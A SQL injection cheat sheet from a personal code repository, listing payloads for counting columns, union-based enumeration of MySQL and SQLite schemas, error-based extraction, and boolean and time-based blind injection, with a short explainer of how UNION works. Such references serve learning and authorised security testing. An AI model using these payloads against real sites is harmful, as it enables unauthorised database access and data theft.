Inicio Explorar Axuda
Iniciar sesión
msc
/
cheatsheets
1
0
Fork 0
Ficheiros Incidencias 0 Pull Requests 0 Wiki
Árbore: ef4ab23b8e
Ramas Etiquetas
cheatsheets
/
cheatsheets
/
security
/
web
/
sql-injection.md

sql-injection.md 2.5 KB
Histórico Raw

title: SQL Injections categories: [cheatsheets]

tags: [security, web]

SQL Injections

Reference:

https://sqlwiki.netspi.com/?dbms=SQLServer

Find number of Columns of the Database

id=1 order by 10-- +
id=1 UNION SELECT 1, 2, 3, 4, .., ..-- +

Information Gathering

MySQL:

id=1 UNION SELECT version()-- +

Possible Functions:

  • version()
  • database()
  • user()
  • system_user()
  • mysql.user

  • @@datadir

    Databases: id=1 UNION SELECT schema_name FROM information_schema.schemata-- +
Tables:    id=1 UNION SELECT table_schema FROM information_schema.tables-- +
Columns:   id=1 UNION SELECT column_name FROM information_schema.columns where table_name=0x<table-name-in-hex>-- +

SQLite:

id=1 UNION SELECT 1, 2 FROM sql_master-- +

UNION

The Way UNION works

Table 1 (Objects):

+----+-----+-------+
| id | obj | color |
+----+-----+-------+
| 1  | Cat | black |
+----+-----+-------+
| 2  | Dog | blue  |
+----+-----+-------+

Table 2 (Persons):

+------+-----+------+
| name | Job | Pass |
+------+-----+------+
| Bart | st  | cara |
+------+-----+------+
| Lisa | st  | sax  |
+------+-----+------+
| magg | by  | oki  |
+------+-----+------+

Join both tables with an UNION:

SELECT * FROM objects UNION SELECT * FROM persons;

+------+-----+------+
| name | Job | Pass |
+------+-----+------+
| 1    | Cat | black|
+------+-----+------+
| 2    | Dog | blue |
+------+-----+------+
| Bart | st  | cara |
+------+-----+------+
| Lisa | st  | sax  |
+------+-----+------+
| magg | by  | oki  |
+------+-----+------+

Problem: Important: Both Table need the same number of columns

Solution:

SELECT * from objects UNION SELECT 1, 2, 3 FROM tablewith10columns;
                                   -------
                                   \-> Needs to be the same number of column than the first table

Problem: If you only need Data from the second Table

Solution:

SELECT * from objects where 1=2 UNION SELECT * from persons; // First query needs to return FALSE or a Dataset that is not present

Error based SQL Injection

Try to force an error and integrate your own query into the error for more information.

Example:

SELECT exp(~(select * from(select user())x));

--> ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

Blind SQL Injection

  • Partial Blind/Boolean

    id=1 UNION SELECT substring(version(),1,1)=5

  • Full Blind

    id=1 UNION SELECT IF(SUBSTRING(version(),1,1)=5,SLEEP(5),null)